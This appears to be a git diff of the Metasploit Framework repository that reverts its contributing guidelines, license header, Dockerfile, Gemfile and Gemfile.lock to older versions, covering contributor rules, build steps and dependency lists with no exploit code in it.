+world -- a better place! What you see here in CONTRIBUTING.md is a
+bullet-point list of the do's and don'ts of how to make sure *your*
+valuable contributions actually make it into Metasploit's master branch.

- - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new/choose) with detailed information about your issue or idea:
- 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
- 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
- - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
- - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
- - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
+If you care not to follow these rules, your contribution **will** be
+closed (*Road House* style). Sorry!

+Incidentally, this is a **short** list. The
+[wiki](https://github.com/rapid7/metasploit-framework/wiki) is much more
+exhaustive and reveals many mysteries. If you read nothing else, take a
+look at the standard [development environment setup
+guide](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment)
+and Metasploit's [Common Coding Mistakes](https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes).

 ## Code Contributions
-For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/Get-Started-Writing-an-Exploit). It will help you to get started and avoid some common mistakes.

-Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
+* **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide).
+* **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages.
+* **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`.

-Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
-will be closed. We need to ensure the code we're adding to master is written to a high standard.
+### Pull Requests

-
-### Code Contribution Do's & Don'ts:
-
-Keeping the following in mind gives your contribution the best chance of landing!
-
-#### <u>Pull Requests</u>
-**Pull request [PR#9966] is a good example to follow.**
-
-* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
-	*  Protect the process.
-	* Ensures users are aware of commits on the branch being considered for merge.
-	* Allows for a location for more commits to be offered without mingling with other contributor changes.
-	* Allows contributors to make progress while a PR is still being reviewed.
-* **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
-* **Do** target your pull request to the **master branch**.
+* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** list [verification steps] so your code is testable.
-* **Do** [reference associated issues] in your pull request description.
+* **Do** include [console output](https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks), especially for witnessable effects in `msfconsole`.
+* **Do** list [verification steps](https://help.github.com/articles/writing-on-github#task-lists) so your code is testable.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
-* **Don't** post questions in older closed PRs.

-#### <u>New Modules</u>
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
-* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
-* **Do** use the many module mixin [API]s.
-* **Do** include instructions on how to setup the vulnerable environment or software.
-* **Do** include [Module Documentation] showing sample run-throughs.
-* **Do** ask cve@rapid7.com for a CVE ID if this describes a new vulnerability (remember to mention your PR number!)
+Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940) and [#3043](https://github.com/rapid7/metasploit-framework/pull/3043) are a couple good examples to follow.
+
+#### New Modules
+
+* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
+* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.

-#### <u>Library Code</u>
-* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
-* **Do** follow [Better Specs] - it's like the style guide for specs.
-* **Do** write [YARD] documentation - this makes it easier for people to use your code.
+#### Library Code
+
+* **Do** write [RSpec](http://rspec.info/) tests - even the smallest change in library land can thoroughly screw things up.
+* **Do** follow [Better Specs](http://betterspecs.org/) - it's like the style guide for specs.
+* **Do** write [YARD](http://yardoc.org/) documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.

-#### <u>Bug Fixes</u>
+#### Bug Fixes
+
 * **Do** include reproduction steps in the form of verification steps.
-* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
+* **Do** include a link to the corresponding [Redmine](https://dev.metasploit.com/redmine/projects/framework) issue in the format of `SeeRM #1234` in your commit description.

 ## Bug Reports

-Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security).
-
-When reporting Metasploit issues:
+* **Do** report vulnerabilities in Rapid7 software to security@rapid7.com.
+* **Do** create a Redmine account and report your bug there.
 * **Do** write a detailed description of your bug and use a descriptive title.
-* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
-* **Don't** file duplicate reports; search for your bug before filing a new report.
-* **Don't** attempt to report issues on a closed PR.
+* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
+* **Don't** file duplicate reports - search for your bug before filing a new report.
+* **Don't** report a bug on GitHub. Use [Redmine](https://dev.metasploit.com/redmine/projects/framework) instead.

-If you need some more guidance, talk to the main body of open source contributors over on our
-[Metasploit Slack] or [#metasploit on Freenode IRC].
+Redmine issues [#8762](https://dev.metasploit.com/redmine/issues/8762) and [#8764](https://dev.metasploit.com/redmine/issues/8764) are a couple good examples to follow.

-Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
-curve, so keep it up!
+If you need some more guidance, talk to the main body of open
+source contributors over on the [Freenode IRC channel](http://webchat.freenode.net/?channels=%23metasploit&uio=d4)
+or e-mail us at [metasploit-hackers](https://lists.sourceforge.net/lists/listinfo/metasploit-hackers)
+mailing list.

-[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
-[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
-[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
-[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
-[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
-[development environment]:http://r-7.co/MSF-DEV
-[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
-[Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
-[Rubocop]:https://rubygems.org/search?query=rubocop
-[50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
-[topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
-[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
-[console output]:https://docs.github.com/en/free-pro-team@latest/github/writing-on-github/creating-and-highlighting-code-blocks#fenced-code-blocks
-[verification steps]:https://docs.github.com/en/free-pro-team@latest/github/writing-on-github/basic-writing-and-formatting-syntax#task-lists
-[reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
-[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
-[API]:https://rapid7.github.io/metasploit-framework/api
-[module documentation]:https://github.com/rapid7/metasploit-framework/wiki/Module-Documentation
-[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
-[RSpec]:http://rspec.info
-[Better Specs]:http://www.betterspecs.org/
-[YARD]:http://yardoc.org
-[Issues]:https://github.com/rapid7/metasploit-framework/issues
-[Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+Also, **thank you** for taking the few moments to read this far! You're
+already way ahead of the curve, so keep it up!
@@ -1,19 +1,19 @@
-Copyright (C) 2006-2020, Rapid7, Inc.
+Copyright (C) 2006-2013, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:

    * Redistributions of source code must retain the above copyright notice,
-    this list of conditions and the following disclaimer.
+	  this list of conditions and the following disclaimer.

    * Redistributions in binary form must reproduce the above copyright notice,
-    this list of conditions and the following disclaimer in the documentation
-    and/or other materials provided with the distribution.
+	  this list of conditions and the following disclaimer in the documentation
+	  and/or other materials provided with the distribution.

    * Neither the name of Rapid7, Inc. nor the names of its contributors
-    may be used to endorse or promote products derived from this software
-    without specific prior written permission.
+	  may be used to endorse or promote products derived from this software
+	  without specific prior written permission.

 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
 ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@@ -1,20 +0,0 @@
-Active Metasploit 5 development will sometimes push aggressive changes.
-Integrations with 3rd-party tools, as well as general usage, may change quickly
-from day to day. Some of the steps for dealing with major changes will be
-documented here. We will continue to maintain the Metasploit 4.x branch until
-Metasploit 5.0 is released.
-
-**2018/01/17 - [internal] module cache reworked to not store metadata in PostgreSQL**
-
-Metasploit no longer stores module metadata in a PostgreSQL database, instead
-storing it in a cache file in your local ~/.msf4 config directory. This has a
-number of advantages:
-
- * Fast searches whether you have the database enabled or not (no more slow search mode)
- * Faster load time for msfconsole, the cache loads more quickly
- * Private module data is not uploaded to a shared database, no collisions
- * Adding or deleting modules no longer displays file-not-found error messages on start in msfconsole
- * Reduced memory consumption
-
-Code that reads directly from the Metasploit database for module data will need
-to use the new module search API.
@@ -1,94 +0,0 @@
-FROM ruby:3.0.4-alpine3.15 AS builder
-LABEL maintainer="Rapid7"
-
-ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
-ENV APP_HOME=/usr/src/metasploit-framework
-ENV TOOLS_HOME=/usr/src/tools
-ENV BUNDLE_IGNORE_MESSAGES="true"
-WORKDIR $APP_HOME
-
-COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
-COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
-COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
-COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
-
-RUN apk add --no-cache \
-      autoconf \
-      bash \
-      bison \
-      build-base \
-      curl \
-      ruby-dev \
-      openssl-dev \
-      readline-dev \
-      sqlite-dev \
-      postgresql-dev \
-      libpcap-dev \
-      libxml2-dev \
-      libxslt-dev \
-      yaml-dev \
-      zlib-dev \
-      ncurses-dev \
-      git \
-      go \
-    && echo "gem: --no-document" > /etc/gemrc \
-    && gem update --system \
-    && bundle config $BUNDLER_ARGS \
-    && bundle install --jobs=8 \
-    # temp fix for https://github.com/bundler/bundler/issues/6680
-    && rm -rf /usr/local/bundle/cache \
-    # needed so non root users can read content of the bundle
-    && chmod -R a+r /usr/local/bundle
-
-ENV GO111MODULE=off
-RUN mkdir -p $TOOLS_HOME/bin && \
-    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.11.2.src.tar.gz && \
-    tar -zxf go1.11.2.src.tar.gz && \
-    rm go1.11.2.src.tar.gz && \
-    cd go/src && \
-    ./make.bash
-
-FROM ruby:3.0.4-alpine3.15
-LABEL maintainer="Rapid7"
-
-ENV APP_HOME=/usr/src/metasploit-framework
-ENV TOOLS_HOME=/usr/src/tools
-ENV NMAP_PRIVILEGED=""
-ENV METASPLOIT_GROUP=metasploit
-
-# used for the copy command
-RUN addgroup -S $METASPLOIT_GROUP
-
-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
-    postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk \
-    python2-dev openssl-dev nasm mingw-w64-gcc
-
-RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
-RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
-
-COPY --from=builder /usr/local/bundle /usr/local/bundle
-RUN chown -R root:metasploit /usr/local/bundle
-COPY . $APP_HOME/
-COPY --from=builder $TOOLS_HOME $TOOLS_HOME
-RUN chown -R root:metasploit $APP_HOME/
-RUN chmod 664 $APP_HOME/Gemfile.lock
-RUN gem update --system
-RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-RUN curl -L -O https://github.com/pypa/get-pip/raw/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/get-pip.py && python get-pip.py && rm get-pip.py
-RUN pip install impacket
-RUN pip install requests
-
-ENV GOPATH=$TOOLS_HOME/go
-ENV GOROOT=$TOOLS_HOME/bin/go
-ENV PATH=${PATH}:${GOPATH}/bin:${GOROOT}/bin
-
-WORKDIR $APP_HOME
-
-# we need this entrypoint to dynamically create a user
-# matching the hosts UID and GID so we can mount something
-# from the users home directory. If the IDs don't match
-# it results in access denied errors.
-ENTRYPOINT ["docker/entrypoint.sh"]
-
-CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]
@@ -1,12 +1,33 @@
 source 'https://rubygems.org'
-# Add default group gems to `metasploit-framework.gemspec`:
-#   spec.add_runtime_dependency '<name>', [<version requirements>]
-gemspec name: 'metasploit-framework'

-# separate from test as simplecov is not run on travis-ci
-group :coverage do
-  # code coverage for tests
-  gem 'simplecov', '0.18.2'
+# Need 3+ for ActiveSupport::Concern
+gem 'activesupport', '>= 3.0.0'
+# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
+gem 'bcrypt-ruby'
+# Needed for some admin modules (scrutinizer_add_user.rb)
+gem 'json'
+# Needed by msfgui and other rpc components
+gem 'msgpack'
+# Needed by anemone crawler
+gem 'nokogiri'
+# Needed by anemone crawler
+gem 'robots'
+# Needed by db.rb and Msf::Exploit::Capture
+gem 'packetfu', '1.1.9'
+
+group :db do
+  # Needed for Msf::DbManager
+  gem 'activerecord'
+  # Database models shared between framework and Pro.
+  gem 'metasploit_data_models', '~> 0.17.0'
+  # Needed for module caching in Mdm::ModuleDetails
+  gem 'pg', '>= 0.11'
+end
+
+group :pcap do
+  gem 'network_interface', '~> 0.0.1'
+  # For sniffer and raw socket modules
+  gem 'pcaprub'
 end

 group :development do
@@ -14,38 +35,31 @@ group :development do
  gem 'redcarpet'
  # generating documentation
  gem 'yard'
-  # for development and testing purposes
-  # lock to version with 2.6 support until project updates
-  gem 'pry-byebug', '~> 3.9.0'
-  # Ruby Debugging Library - rebuilt and included by default from Ruby 3.1 onwards.
-  # Replaces the old lib/debug.rb and provides more features.
-  gem 'debug', '>= 1.0.0'
-  # module documentation
-  gem 'octokit'
-  # memory profiling
-  gem 'memory_profiler'
-  # cpu profiling
-  gem 'ruby-prof', '1.4.2'
-  # Metasploit::Aggregator external session proxy
-  # disabled during 2.5 transition until aggregator is available
-  # gem 'metasploit-aggregator'
 end

 group :development, :test do
-  # automatically include factories from spec/factories
-  gem 'factory_bot_rails'
+  # supplies factories for producing model instance for specs
+  # Version 4.1.0 or newer is needed to support generate calls without the
+  # 'FactoryGirl.' in factory definitions syntax.
+  gem 'factory_girl', '>= 4.1.0'
  # Make rspec output shorter and more useful
-  gem 'fivemat'
+  gem 'fivemat', '1.2.1'
  # running documentation generation tasks and rspec tasks
-  gem 'rake'
-  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
-  # environment is development
-  gem 'rspec-rails'
-  gem 'rspec-rerun'
-  gem 'rubocop'
+  gem 'rake', '>= 10.0.0'
 end

 group :test do
+  # Removes records from database created during tests.  Can't use rspec-rails'
+  # transactional fixtures because multiple connections are in use so
+  # transactions won't work.
+  gem 'database_cleaner'
+  # testing framework
+  gem 'rspec', '>= 2.12'
+  gem 'shoulda-matchers'
+  # code coverage for tests
+  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
+  gem 'simplecov', '0.5.4', :require => false
  # Manipulate Time.now in specs
  gem 'timecop'
 end
@@ -1,35 +0,0 @@
-##
-# Example Gemfile.local file for Metasploit Framework
-#
-# The Gemfile.local file provides a way to use other gems that are not
-# included in the standard Gemfile provided with Metasploit.
-# This filename is included in Metasploit's .gitignore file, so local changes
-# to this file will not accidentally show up in future pull requests. This
-# example Gemfile.local includes all gems in Gemfile using instance_eval.
-# It also creates a new bundle group, 'local', to hold additional gems.
-#
-# This file will not be used by default within the framework. As such, one
-# must first install the custom Gemfile.local with bundle:
-#   bundle install --gemfile Gemfile.local
-#
-# Note that msfupdate does not consider Gemfile.local when updating the
-# framework. If it is used, it may be necessary to run the above bundle
-# command after the update.
-#
-###
-
-# Include the Gemfile included with the framework. This is very
-# important for picking up new gem dependencies.
-msf_gemfile = File.join(File.dirname(__FILE__), 'Gemfile')
-if File.readable?(msf_gemfile)
-  instance_eval(File.read(msf_gemfile))
-end
-
-# Create a custom group
-group :local do
-  # This is the first way to add a non-standard gem file dependency in.
-  gem 'lab', '~> 0.2.7'
-  # And this is another way that references local directories to find and compile the gem file as needed.
-  # This is the optimal method for testing Gem PRs such as those in rex-text or rex-powershell.
-  gem 'rex-powershell', path: '../rex-powershell'
-end
@@ -1,523 +1,84 @@
-PATH
-  remote: .
-  specs:
-    metasploit-framework (6.2.24)
-      actionpack (~> 6.0)
-      activerecord (~> 6.0)
-      activesupport (~> 6.0)
-      aws-sdk-ec2
-      aws-sdk-iam
-      aws-sdk-s3
-      bcrypt
-      bcrypt_pbkdf
-      bson
-      concurrent-ruby (= 1.0.5)
-      dnsruby
-      ed25519
-      em-http-request
-      eventmachine
-      faker
-      faraday
-      faraday-retry
-      faye-websocket
-      filesize
-      hrr_rb_ssh-ed25519
-      http-cookie
-      irb
-      jsobfu
-      json
-      metasm
-      metasploit-concern
-      metasploit-credential
-      metasploit-model
-      metasploit-payloads (= 2.0.97)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.20)
-      mqtt
-      msgpack
-      nessus_rest
-      net-ldap
-      net-smtp
-      net-ssh
-      network_interface
-      nexpose
-      nokogiri
-      octokit (~> 4.0)
-      openssl-ccm
-      openvas-omp
-      packetfu
-      patch_finder
-      pcaprub
-      pdf-reader
-      pg
-      puma
-      railties
-      rb-readline
-      recog
-      redcarpet
-      rex-arch
-      rex-bin_tools
-      rex-core
-      rex-encoder
-      rex-exploitation
-      rex-java
-      rex-mime
-      rex-nop
-      rex-ole
-      rex-powershell
-      rex-random_identifier
-      rex-registry
-      rex-rop_builder
-      rex-socket
-      rex-sslscan
-      rex-struct2
-      rex-text
-      rex-zip
-      ruby-macho
-      ruby_smb (~> 3.2.0)
-      rubyntlm
-      rubyzip
-      sinatra
-      sqlite3
-      sshkey
-      swagger-blocks
-      thin
-      tzinfo
-      tzinfo-data
-      unix-crypt
-      warden
-      win32api
-      windows_error
-      winrm
-      xdr
-      xmlrpc
-      zeitwerk
-
 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.1.0)
-    actionpack (6.1.7)
-      actionview (= 6.1.7)
-      activesupport (= 6.1.7)
-      rack (~> 2.0, >= 2.0.9)
-      rack-test (>= 0.6.3)
-      rails-dom-testing (~> 2.0)
-      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (6.1.7)
-      activesupport (= 6.1.7)
-      builder (~> 3.1)
-      erubi (~> 1.4)
-      rails-dom-testing (~> 2.0)
-      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (6.1.7)
-      activesupport (= 6.1.7)
-    activerecord (6.1.7)
-      activemodel (= 6.1.7)
-      activesupport (= 6.1.7)
-    activesupport (6.1.7)
-      concurrent-ruby (~> 1.0, >= 1.0.2)
-      i18n (>= 1.6, < 2)
-      minitest (>= 5.1)
-      tzinfo (~> 2.0)
-      zeitwerk (~> 2.3)
-    addressable (2.8.1)
-      public_suffix (>= 2.0.2, < 6.0)
-    afm (0.2.2)
-    arel-helpers (2.14.0)
-      activerecord (>= 3.1.0, < 8)
-    ast (2.4.2)
-    aws-eventstream (1.2.0)
-    aws-partitions (1.648.0)
-    aws-sdk-core (3.162.0)
-      aws-eventstream (~> 1, >= 1.0.2)
-      aws-partitions (~> 1, >= 1.525.0)
-      aws-sigv4 (~> 1.1)
-      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.341.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.71.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.58.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
-      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.115.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
-      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.4)
-    aws-sigv4 (1.5.2)
-      aws-eventstream (~> 1, >= 1.0.2)
-    bcrypt (3.1.18)
-    bcrypt_pbkdf (1.1.0)
-    bindata (2.4.13)
-    bson (4.15.0)
-    builder (3.2.4)
-    byebug (11.1.3)
-    coderay (1.1.3)
-    concurrent-ruby (1.0.5)
-    cookiejar (0.3.3)
-    crass (1.0.6)
-    daemons (1.4.1)
-    debug (1.6.2)
-      irb (>= 1.3.6)
-      reline (>= 0.3.1)
-    diff-lcs (1.5.0)
-    dnsruby (1.61.9)
-      simpleidn (~> 0.1)
-    docile (1.4.0)
-    domain_name (0.5.20190701)
-      unf (>= 0.0.5, < 1.0.0)
-    ed25519 (1.3.0)
-    em-http-request (1.1.7)
-      addressable (>= 2.3.4)
-      cookiejar (!= 0.3.1)
-      em-socksify (>= 0.3)
-      eventmachine (>= 1.0.3)
-      http_parser.rb (>= 0.6.0)
-    em-socksify (0.3.2)
-      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.11.0)
-    eventmachine (1.2.7)
-    factory_bot (6.2.1)
-      activesupport (>= 5.0.0)
-    factory_bot_rails (6.2.0)
-      factory_bot (~> 6.2.0)
-      railties (>= 5.0.0)
-    faker (2.23.0)
-      i18n (>= 1.8.11, < 2)
-    faraday (2.6.0)
-      faraday-net_http (>= 2.0, < 3.1)
-      ruby2_keywords (>= 0.0.4)
-    faraday-net_http (3.0.1)
-    faraday-retry (2.0.0)
-      faraday (~> 2.0)
-    faye-websocket (0.11.1)
-      eventmachine (>= 0.12.0)
-      websocket-driver (>= 0.5.1)
-    ffi (1.15.5)
-    filesize (0.2.0)
-    fivemat (1.3.7)
-    gssapi (1.3.1)
-      ffi (>= 1.0.1)
-    gyoku (1.4.0)
-      builder (>= 2.1.2)
-      rexml (~> 3.0)
-    hashery (2.1.2)
-    hrr_rb_ssh (0.4.2)
-    hrr_rb_ssh-ed25519 (0.4.2)
-      ed25519 (~> 1.2)
-      hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.5)
-      domain_name (~> 0.5)
-    http_parser.rb (0.8.0)
-    httpclient (2.8.3)
-    i18n (1.12.0)
-      concurrent-ruby (~> 1.0)
-    io-console (0.5.11)
-    irb (1.4.2)
-      reline (>= 0.3.0)
-    jmespath (1.6.1)
-    jsobfu (0.4.2)
-      rkelly-remix
-    json (2.6.2)
-    little-plugger (1.1.4)
-    logging (2.3.1)
-      little-plugger (~> 1.1)
-      multi_json (~> 1.14)
-    loofah (2.19.0)
-      crass (~> 1.0.2)
-      nokogiri (>= 1.5.9)
-    memory_profiler (1.0.0)
-    metasm (1.0.5)
-    metasploit-concern (4.0.5)
-      activemodel (~> 6.0)
-      activesupport (~> 6.0)
-      railties (~> 6.0)
-    metasploit-credential (5.0.9)
-      metasploit-concern
-      metasploit-model
-      metasploit_data_models (>= 5.0.0)
-      net-ssh
+    activemodel (3.2.14)
+      activesupport (= 3.2.14)
+      builder (~> 3.0.0)
+    activerecord (3.2.14)
+      activemodel (= 3.2.14)
+      activesupport (= 3.2.14)
+      arel (~> 3.0.2)
+      tzinfo (~> 0.3.29)
+    activesupport (3.2.14)
+      i18n (~> 0.6, >= 0.6.4)
+      multi_json (~> 1.0)
+    arel (3.0.2)
+    bcrypt-ruby (3.1.2)
+    builder (3.0.4)
+    database_cleaner (1.1.1)
+    diff-lcs (1.2.4)
+    factory_girl (4.2.0)
+      activesupport (>= 3.0.0)
+    fivemat (1.2.1)
+    i18n (0.6.5)
+    json (1.8.0)
+    metasploit_data_models (0.17.0)
+      activerecord (>= 3.2.13)
+      activesupport
      pg
-      railties
-      rex-socket
-      rubyntlm
-      rubyzip
-    metasploit-model (4.0.6)
-      activemodel (~> 6.0)
-      activesupport (~> 6.0)
-      railties (~> 6.0)
-    metasploit-payloads (2.0.97)
-    metasploit_data_models (5.0.5)
-      activerecord (~> 6.0)
-      activesupport (~> 6.0)
-      arel-helpers
-      metasploit-concern
-      metasploit-model (>= 3.1)
-      pg
-      railties (~> 6.0)
-      recog (~> 2.0)
-      webrick
-    metasploit_payloads-mettle (1.0.20)
-    method_source (1.0.0)
-    mini_portile2 (2.8.0)
-    minitest (5.16.3)
-    mqtt (0.5.0)
-    msgpack (1.6.0)
-    multi_json (1.15.0)
-    mustermann (3.0.0)
-      ruby2_keywords (~> 0.0.1)
-    nessus_rest (0.1.6)
-    net-ldap (0.17.1)
-    net-protocol (0.1.3)
-      timeout
-    net-smtp (0.3.2)
-      net-protocol
-    net-ssh (7.0.1)
-    network_interface (0.0.2)
-    nexpose (7.3.0)
-    nio4r (2.5.8)
-    nokogiri (1.13.9)
-      mini_portile2 (~> 2.8.0)
-      racc (~> 1.4)
-    nori (2.6.0)
-    octokit (4.25.1)
-      faraday (>= 1, < 3)
-      sawyer (~> 0.9)
-    openssl-ccm (1.2.3)
-    openssl-cmac (2.0.2)
-    openvas-omp (0.0.4)
-    packetfu (1.1.13)
-      pcaprub
-    parallel (1.22.1)
-    parser (3.1.2.1)
-      ast (~> 2.4.1)
-    patch_finder (1.0.2)
-    pcaprub (0.13.1)
-    pdf-reader (2.10.0)
-      Ascii85 (~> 1.0)
-      afm (~> 0.2.1)
-      hashery (~> 2.0)
-      ruby-rc4
-      ttfunk
-    pg (1.4.4)
-    pry (0.13.1)
-      coderay (~> 1.1)
-      method_source (~> 1.0)
-    pry-byebug (3.9.0)
-      byebug (~> 11.0)
-      pry (~> 0.13.0)
-    public_suffix (5.0.0)
-    puma (6.0.0)
-      nio4r (~> 2.0)
-    racc (1.6.0)
-    rack (2.2.4)
-    rack-protection (3.0.2)
-      rack
-    rack-test (2.0.2)
-      rack (>= 1.3)
-    rails-dom-testing (2.0.3)
-      activesupport (>= 4.2.0)
-      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.3)
-      loofah (~> 2.3)
-    railties (6.1.7)
-      actionpack (= 6.1.7)
-      activesupport (= 6.1.7)
-      method_source
-      rake (>= 12.2)
-      thor (~> 1.0)
-    rainbow (3.1.1)
-    rake (13.0.6)
-    rb-readline (0.5.5)
-    recog (2.3.23)
-      nokogiri
-    redcarpet (3.5.1)
-    regexp_parser (2.6.0)
-    reline (0.3.1)
-      io-console (~> 0.5)
-    rex-arch (0.1.14)
-      rex-text
-    rex-bin_tools (0.1.8)
-      metasm
-      rex-arch
-      rex-core
-      rex-struct2
-      rex-text
-    rex-core (0.1.28)
-    rex-encoder (0.1.6)
-      metasm
-      rex-arch
-      rex-text
-    rex-exploitation (0.1.36)
-      jsobfu
-      metasm
-      rex-arch
-      rex-encoder
-      rex-text
-      rexml
-    rex-java (0.1.6)
-    rex-mime (0.1.7)
-      rex-text
-    rex-nop (0.1.2)
-      rex-arch
-    rex-ole (0.1.7)
-      rex-text
-    rex-powershell (0.1.97)
-      rex-random_identifier
-      rex-text
-      ruby-rc4
-    rex-random_identifier (0.1.9)
-      rex-text
-    rex-registry (0.1.4)
-    rex-rop_builder (0.1.4)
-      metasm
-      rex-core
-      rex-text
